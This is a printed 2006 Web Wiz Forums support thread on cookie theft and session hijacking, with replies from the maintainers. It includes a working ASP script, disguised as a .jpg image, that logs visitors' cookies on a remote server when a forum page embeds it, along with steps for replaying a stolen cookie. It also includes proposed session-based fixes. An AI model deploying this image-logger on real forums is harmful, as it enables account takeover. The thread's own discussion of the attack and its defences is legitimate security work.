Web Wiz Forums - Dear Web Wiz Family, big secure problem.

Dear Web Wiz Family, big secure problem.

Printed From: Web Wiz Forums
Category: Web Wiz Web App Support Forums
Forum Name: Web Wiz Forums
Forum Description: Support forum for Web Wiz Forums application.
URL: https://forums.webwiz.net/forum_posts.asp?TID=18605
Printed Date: 28 March 2026 at 2:20pm
Software Version: Web Wiz Forums 12.08 - https://www.webwizforums.com

Topic: Dear Web Wiz Family, big secure problem.

Posted By: emr550m
Subject: Dear Web Wiz Family, big secure problem.
Date Posted: 05 March 2006 at 12:42am

First of all, i am very thank full to you about creating a wonderfull forum like this and make it open source. I am using web wiz version 7.9 and dont know the new ones.

I have combined my site with web wiz forum and make a good portal. But these days some people (they calls them hacker, i call them dummy person :) is making me sad. I am searching about the edit hack. Any user can be edit any message. How this can be happen ? i m searching this right now.

While i m searching this i 'll found lots of ugly things that not to be. Please all web masters read this carefully;

Web wiz forums (7.9) will working on cookies. İf some one can steal your cookie, he/she can enter the forum as you very easily. With a cookie editor tihs can be done very easily.

A have solved this with a simple code change. Just modify the common asp where the UID cookie stored. Store the data on session object.

After modifying the forum will see this is not the only thing. A have found a worse thing that is the ugliest thing. IIS web server has a big huge problem.

As you know when you connect to a IIS web server it gives you a unic sessio id. with this id you will interact with the server. Browsers stores this id as a cookie and it can also be stealen.

Some one who has your session id can conect to web server as you. So when you ar online as admin the dummy guy can connect the server as you and blow your forum.

Microsoft also knows this issue and dont do anythink. So we must find our solution.

I have defined a general variable in session data that is session("securecode") , i will equal this data to session id + clients ip ;

in every common asp i have look up the clients ip and session. if its not equal to session("securecode") that means some one is connected to server as you...

You can freely write me about these two articles freely. My contact email is: mailto:info@genc-tanitim.com - info@genc-tanitim.com . You can disscuss on msn also: mailto:emr550maranello@hotmail.com - emr550maranello@hotmail.com .

Now my problem is about editing hack. I see that some posts are edited with another users that dont have permission. How this can bi happen? what code should i modify in edit post .asp.

Wery gladfull with meeting you.

Emrah �z

Replies:

Posted By: MadDog
Date Posted: 05 March 2006 at 1:30am

There is not a problem if you update to the latest version!

There are no cookie hacks to steal peoples accounts.

-------------
http://www.iportalx.net" rel="nofollow">

Posted By: emr550m
Date Posted: 05 March 2006 at 1:53am

sir, thats the problem. i have many modifications on the asp pages. So i cant directly put the new file. I just need which which code part will solve this edit hack problem.

Posted By: dpyers
Date Posted: 05 March 2006 at 5:45am

Cookie hacks are only a concern if you're using a shared computer - such as in an internet cafe. Not selecting "remember me" and logging out when done resolves that issue.

Session hijacking is pretty much a thing of the past unless you have a crooked host.

-------------

Lead me not into temptation... I know the short cut, follow me.

Posted By: emr550m
Date Posted: 05 March 2006 at 11:57am

Sir cookie stealing can be done from everywhere. Just a single image. Hackers executes emages as php or asp files. The just put the image to their server, and use .

Int. browsers are very dummy things, while it was opening this forum and when it tries to open the image it sends currunt cookies to the image also. So its not an image, it will take our cookie. The same way session hijacking is done.

Default mic. IIS doesnt block session hijcakers. Im thinking about writing an ISAPI filter for that.

Posted By: MadDog
Date Posted: 05 March 2006 at 7:46pm

You can only read cookies from the domain you are on. Since the php/asp file is on a different server it can not read a cookie from the server the image is being called on.

You can not steal cookies using remote asp/php image files.

-------------
http://www.iportalx.net" rel="nofollow">

Posted By: emr550m
Date Posted: 05 March 2006 at 8:14pm

Are you sure about that? I m just thinking like that, but you re wrong. This is just a browser fault. Simple cookie stealin method( this subject is not a hacking i tell this to warn you to secure yourself.)

First of all you need to add the ".jpg" extensions will executed by asp.dll. (This will executes jpg files as asp)

You will create a file that has this code and save it on server. Example name: s.jpg
files web adress is like "http://www.example.com/s.jpg"
Sample code:

<%
dim fs, f,x
set fs=Server.CreateObject("Scripting.FileSystemObject")
set x=fs.GetFile(Server.MapPath("ekledik.txt"))

set f=x.OpenAsTextStream(8)
f.WriteLine(request.ServerVariables("HTTP_COOKIE"))
f.Close
set f=nothing
set fs=nothing

%>

you can also do everything in this. Users see this is just an jpg file. And then you will add this code to the forum which you wantted to steal cookies of users. (Simply use [ IMG ] http://www.example.com/s.jpg[/ IMG])

After that the most ugly thing is;
both Mozilla Firefox, and Internet explorer sends the same cookie to server to gather this image when you are browsing to the forum.

You can freely test this. I will test and see that thats right. The stealer can connect to forum as you just a cookie editor. He copies the stolen one to his cookie. Than blooooom!

I m using version 7.9 of web wiz. This version is open to this attack. And i modiified the cookie as session objects.

Posted By: MadDog
Date Posted: 05 March 2006 at 10:09pm

I am telling you it is not possible to use asp or php code to get the cookies from another domain.

If you use "http://www.example.com/s.jpg" on the domain "http://www.webwiz.net" you can not read the cookies from Web Wiz. It will try to read the cookies from example.com

I even coded a test file before i made my first reply.

Edit: NEVERMIND! You are right. As soon as i made the custom extension and tested a asp coded file it did read the cookie! Thats not good! But keep in mind i tested this locally, not on WWF so im not sure if it works 100%.

2nd Edit: I believe i was only getting the cookie from my local system and not WWF. I can not recreate this error after clearing my cookies from localhost. I do not believe this is a problem but i will be doing some more tests to make sure.

-------------
http://www.iportalx.net" rel="nofollow">

Posted By: Gullanian
Date Posted: 05 March 2006 at 11:57pm

Wow! This is a pretty big security problem, I will test it myself later.

Posted By: emr550m
Date Posted: 06 March 2006 at 12:45am

I have some modifications to solve this problem. I can help either. But this is not your or web wiz forums fault. This is the browser developers and microsoft IIS 2s problem. I dont know if Apache servers able to Session hijacking but the will i think.

I'll try to build a ISAPI filter to find out session hijackers. Cookie problem cannot be solved until a secure browser will be developed. I'll use session datas in y forum;

I 'll modify the code in common.asp below

'Read in users ID number from the cookie
strLoggedInUserCode = Trim(Mid(Request.Cookies(strCookieName)("UID"), 1, 44))

i'll change it something like that;

dim tmp_secure
tmp_secure=session.SessionID& request.ServerVariables("REMOTE_ADDR")
securesession=session("securesession")
if(tmp_secure=securesession)then
strLoggedInUserCode = session("UID")
else
strLoggedInUserCode=""
end if

and in log_in_ser.asp;


            Response.Cookies(strCookieName)("UID") = strUserCode


change this to;

    session("UID")= strUserCode
            session("securesession") = session.SessionID & request.ServerVariables("REMOTE_ADDR")


this will translate the whole forum without cookie. It will run on session data. Dont forget to change the log_off_user.asp or you cannot log of until you close the browser window.

Make the same change to admin/common.asp also.

Posted By: WebWiz-Bruce
Date Posted: 06 March 2006 at 11:36am

Sorry I have not seen this topic earlier, but it was posted in the wrong forum.

I am aware of all these issues and Web Wiz Forums does have security in place to prevent or limit the effects as much as possible.

If you select the auto login feature then an auto login cookie is set on your machine, which can course issues if a hacker gets hold of this cookie.

To prevent and limit this problem as much as possiable a number of things are in place.

Things to prevent this issue in 7.97 include:-

Session variables are used for the admin section and the admin is forced to re-login to gain access to the admin section.
Auto login/tracking cookie is updated in many parts, so the auto-login code is changed often
Session cookies are used if auto-login is not selected
Access users are informed to rename and protect their Access database so login data is not comprised
Security filters are used to filter unsafe user input to try and prevent cookie data being stolen
Passwords are 160bit one way encrypted

Version 8 builds on this and adds more protection:-

Version 8 beta 2 onwards uses it's own propriety session tracking system, with additional IP checking for extra protection (much like emr550m mentions)
New propriety session system times out after 20 minutes of inactivity, meaning if the hacker does get hold of your session ID they have less than 20 minutes to get past the additional session ID security and use the session ID
Session data held in application array for extra security (unless load balanced or web gardens are used in which case it's stored, slightly less securely, in the database)
Auto-login cookie is still used as people demand this even though there is a small risk off the cookie being hijacked (it is recommended not to use auto-login)
The admin section uses a second more secure login system that auto-login can not be used on and the admin must re-login to gain access to the admin section
Security filters have been updated to filter more unsafe content to prevent cookie hijacking
The auto-login cookie is updated more often

At the end of the day the biggest issue here is that HTTP is a stateless protocol, meaning that the connection to the web server is not maintained and dropped as soon as the page loads in the browser window.

This means the only way to track and identify users is to place some sort of identity seed on the users machine, in either the form of a cookie or a session ID.

Until the system of how HTTP works is changed or a new protocol can be used for viewing web pages there will always be a risk that the identity seed placed on the users machine can be hijacked.

These issues should be known to all web masters, and measures put in place to limit this type of thing as much as possible.

Many months of on-going research, testing, and developing new and improved ways of limiting these inherent issues goes into Web Wiz Forums to make sure it is the most secure forum software around.

Posted By: emr550m
Date Posted: 06 March 2006 at 12:55pm

Yes, stateles protocols are always big troble. But microsoft can do something about that.

If it will check the connection ip and port of the visitors nobody can steal the sessions. I m working ISAPI filters right know. I'll try to monitor the connections an try to catch stealer. Teoritically this can be done. I'll write it here if I can done.

Posted By: Quinox
Date Posted: 16 March 2006 at 7:27am

You may not be able to steal cookies that way, but you sure can steal the session ID stored in the URL of clients with cookies disabled that way. By using a PHP or ASP to process an image and send it to the client, you can capture the HTTP_REFERER (which will have the query string in it) as well as REMOTE_USER for the IP.

So it looks to me that it's safer to enable cookies on the forum than to block them.

Posted By: WebWiz-Bruce
Date Posted: 16 March 2006 at 11:51am

It will be safer to use cookies, and by default Web Wiz Forums will use cookies to store the session ID.

Having the session appended to the URL will only happen on an individual user basis if cookies are detected as not working.

As most people have cookies enabled the session ID will always be stored in a cookie, but there are always people for whatever reason can't get cookies to work, in which case they will have to use the slightly less secure method of appending the session ID to the URL.

I personally would rather just go down the more secure root of only using only cookies, but the cookie issue some users get is such a pain for forum admins that some option for those that can't use cookies needs to be incorporated into the software.